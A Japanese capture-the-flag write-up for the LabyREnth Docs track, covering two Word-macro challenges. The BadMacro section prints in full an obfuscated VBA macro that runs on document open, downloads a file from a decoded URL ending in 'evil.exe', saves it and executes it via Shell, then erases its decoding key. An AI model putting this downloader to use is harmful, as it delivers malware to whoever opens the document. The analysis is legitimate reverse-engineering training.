LabyREnth CTF (Docs)
1. はじめに
2. writeup
・BadMacro (Docs Lv1)
zipを解凍する(Pass : infected)とchallenge.docが出てくる.
challenge.docからVBAを抽出する.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' String decoder used by every obfuscated literal in this macro.
' Each element of HGKuttPaRM is XORed with one character of a key text and
' the resulting characters are concatenated into the returned string.
'
' HGKuttPaRM - array of numeric ciphertext elements, read at index 0..UBound
'              (assumes the zero-based arrays produced by Array() - confirm).
' UBvkWqzieX - offset added to the key position, so each caller decodes
'              against a different window of the key text.
'
' NOTE(review): the key is not in the VBA source. It is read from the document
' variable "ppKzr", so the strings cannot be recovered from the extracted
' macro text alone; the value stored in the original document is needed.
Private Function QklkhFEQNB(HGKuttPaRM As Variant, UBvkWqzieX As Integer)
' Only vSHOfSrEta is typed As String here; the other three are Variants.
Dim gsFEVmmIzO, vSHOfSrEta As String, dHLdiEqdts, eUTAbMoUIA
' Key text comes from the document itself.
vSHOfSrEta = ActiveDocument.Variables("ppKzr").Value()
gsFEVmmIzO = ""
' dHLdiEqdts is a 1-based counter; the array element used is dHLdiEqdts - 1.
dHLdiEqdts = 1
While dHLdiEqdts < UBound(HGKuttPaRM) + 2
' Key position cycles through 1..Len(key): a remainder of 0 is mapped to Len(key).
eUTAbMoUIA = dHLdiEqdts Mod Len(vSHOfSrEta): If eUTAbMoUIA = 0 Then eUTAbMoUIA = Len(vSHOfSrEta)
' Key character at (position + offset) XOR ciphertext element -> plaintext character.
' Mid() past the end of the key returns "" and Asc("") raises an error, so the
' stored key has to extend beyond every position + offset that is actually used.
gsFEVmmIzO = gsFEVmmIzO + Chr(Asc(Mid(vSHOfSrEta, eUTAbMoUIA + UBvkWqzieX, 1)) Xor CInt(HGKuttPaRM(dHLdiEqdts - 1)))
dHLdiEqdts = dHLdiEqdts + 1
Wend
QklkhFEQNB = gsFEVmmIzO
End Function
' Payload routine: decodes its strings with QklkhFEQNB, performs one HTTP
' request, writes the response body to a file and passes that file to Shell.
' All literals (request target, method, object names, file name) are stored
' encoded, so none of them appear in a plain string search of the macro.
'
' Detection view: the visible sequence is an Office macro creating two objects
' via CreateObject, saving a network response to disk and then launching it
' with Shell.
Public Function BkAIuNwQNDkohBY()
' twOvwCSTPL is used below as the second argument of xHttp.Open, i.e. the request target.
twOvwCSTPL = QklkhFEQNB(Array(5, 5, 27, 65, 89, 98, 85, 86, 71, 75, 66, 92, 95, 98, 67, 64, 89, 83, 84, 95, 26, _
78, 116, 78, 91, 5, 116, 32, 72, 2, 33, 48, 10, 29, 61, 8, 37, 20, 63, 44, 1, _
12, 62, 38, 47, 52, 99, 57, 5, 121, 89, 37, 65, 32, 32, 11, 98, 42, 58, 32, 28, _
9, 3, 117, 85, 4, 57, 10, 94, 0, 16, 8, 28, 42, 30, 121, 71, 6, 8, 9, 37, _
2, 23, 34, 21, 120, 54, 7, 40, 35, 75, 50, 87, 3, 55, 47, 99, 52, 13, 0, 42, _
30, 27, 126, 59, 3, 123, 29, 52, 44, 53, 29, 15, 50, 12, 35, 8, 48, 89, 54, 27, _
62, 28, 8, 36, 49, 119, 104, 14, 5, 64, 34, 43, 22, 71, 5, 46, 7, 66, 42, 0, _
1, 113, 97, 83, 31, 45, 95, 111, 31, 40, 51), 24)
' Three-character string used as the first argument of xHttp.Open (the request method).
UkIWIEtqCF = QklkhFEQNB(Array(42, 115, 2), 188)
' Both object names are decoded at run time. Presumably an HTTP request object
' and a binary stream object (the .Type/.Open/.write/.savetofile members used
' below match ADODB.Stream) - confirm against the decoded values.
Dim xHttp: Set xHttp = CreateObject(QklkhFEQNB(Array(116, 7, 6, 74, 60, 43, 42, 36, 64, 70, 110, 27, 28, 12, 12, 17, 23), 0))
Dim bStrm: Set bStrm = CreateObject(QklkhFEQNB(Array(15, 32, 32, 53, 35, 89, 22, 25, 65, 53, 51, 26), 176))
' Third argument False: presumably a synchronous request - confirm for the decoded object type.
xHttp.Open UkIWIEtqCF, twOvwCSTPL, False
xHttp.Send
With bStrm
' NOTE(review): 1 looks like the binary stream type - confirm.
.Type = 1
.Open
.write xHttp.responseBody
' Seven-character file name; the trailing 2 is presumably the overwrite save option - confirm.
.savetofile QklkhFEQNB(Array(20, 39, 81, 118, 52, 78, 11), 17), 2
End With
' Same encoded array and offset as the savetofile call: the file just written is what gets run.
Shell (QklkhFEQNB(Array(20, 39, 81, 118, 52, 78, 11), 17))
End Function
' Word event handler: runs when the document is opened (with macros enabled).
' Runs the payload once, then replaces the decoding key stored in the document.
'
' NOTE(review): after the first run the variable "ppKzr" holds "toto" instead
' of the key and the document is saved, so an opened-and-saved copy no longer
' contains what QklkhFEQNB needs. Analysis has to start from an untouched copy.
Private Sub Document_Open()
' "toto" marks "already executed"; any other value is treated as the live key.
If ActiveDocument.Variables("ppKzr").Value <> "toto" Then
BkAIuNwQNDkohBY
' Overwrite the key so the strings can no longer be decoded from this file.
ActiveDocument.Variables("ppKzr").Value = "toto"
' Persist the overwrite when the document is writable.
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub
しかしこのままでは可読性が悪いので変数名等を書き換えて整形する.
これをVBE上で実行する. ただしHTTPリクエストとシェル実行はされたくないのでコメントアウトして, Debug.Printを用いてイミディエイトウインドウに出力した.
出力されたURL http://10.1.33.7/b64/x58/MDgxOTE2MjMwZTMxMDIzMTNhNjk2YjA3NjgzNjM0MjE2YTJjMzA2ODJiNmIwNzBmMzA2ODA3MTMz\nNjY4MmYwNzJmMzA2YjJhNmI2YTM0Njg2ODMzMjU=/evil.exe に注目すると, パスにb64とx58という文字列が含まれているので, 続く文字列はbase64とXOR 0x58でエンコードされていると予想し, Pythonでデコードするスクリプトを書いた.
FLAG : PAN{ViZib13_0nly2th0s3_Wh0_Kn0w_wh3r32l00k}
・CrackDoc (Docs Lv2)
zipを解凍する(Pass : infected)とCrackDoc.docが出てくる.
UserFormにパスワードを入力すれば良い. 同様にVBAを抽出する.
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{8AF7E01A-2331-4925-95C1-AA63132A39D5}{BF4AE4DE-16B1-4C4B-ABB6-3A501B9C5B0F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub button_Click()
    ' Click handler of the password form: encrypts the text of the "key" control
    ' with suchcrypto under the fixed key "General Vidal" and compares the result
    ' with the expected ciphertext.
    ' The comparison is against ciphertext under a key embedded in the macro;
    ' since suchcrypto only XORs the input with a keystream derived from that key,
    ' the check does not keep the expected input secret from anyone holding the file.
    Const TARGET = "171,184,42,184,88,26,47,154,20,219,203,130,52,19,180,214,156,94,186,74,30,248,119,235,139,130,175,141,179,197,8,204,252,"

    x = suchcrypto(key.Text, "General Vidal")

    ' Guard clause: report the failure first and leave.
    If x <> TARGET Then
        MsgBox "U can do. Try harder..."
        Exit Sub
    End If

    MsgBox "Wow. Good Job! Such crack."
End Sub
Function suchcrypto(sMessage, strKey)
    ' RC4-style stream cipher.
    ' Builds a 256-entry permutation from strKey, discards the first 3072
    ' keystream steps, then XORs each character of sMessage with one keystream
    ' byte. The result is the ciphertext as decimal values, each followed by ",".
    ' The keystream depends only on strKey, so applying the same keystream to the
    ' ciphertext bytes yields the original message.
    Dim keyLen, p, q, n, held
    Dim sbox(256)

    keyLen = Len(strKey)

    ' Start from the identity permutation.
    For n = 0 To 255
        sbox(n) = n
    Next n

    ' Key scheduling: the key is repeated cyclically across the 256 positions.
    q = 0
    For n = 0 To 255
        q = (q + Asc(Mid(strKey, (n Mod keyLen) + 1, 1)) + sbox(n)) Mod 256
        held = sbox(n): sbox(n) = sbox(q): sbox(q) = held
    Next n

    p = 0
    q = 0

    ' Advance the generator 3072 times without producing output.
    For n = 1 To 3072
        p = (p + 1) Mod 256
        q = (q + sbox(p)) Mod 256
        held = sbox(p): sbox(p) = sbox(q): sbox(q) = held
    Next n

    ' One keystream byte per message character, appended as "<value>,".
    For n = 1 To Len(sMessage)
        p = (p + 1) Mod 256
        q = (q + sbox(p)) Mod 256
        held = sbox(p): sbox(p) = sbox(q): sbox(q) = held
        suchcrypto = suchcrypto & (sbox((sbox(p) + sbox(q)) Mod 256) Xor Asc(Mid(sMessage, n, 1))) & ","
    Next n
End Function
FLAG : PAN{L4$t_Night_@f@iry_Vizited_M3}
3. 補足
公式にてwriteupが公開されている. 1week毎に1trackずつ公開される模様.
researchcenter.paloaltonetworks.com
kmdnet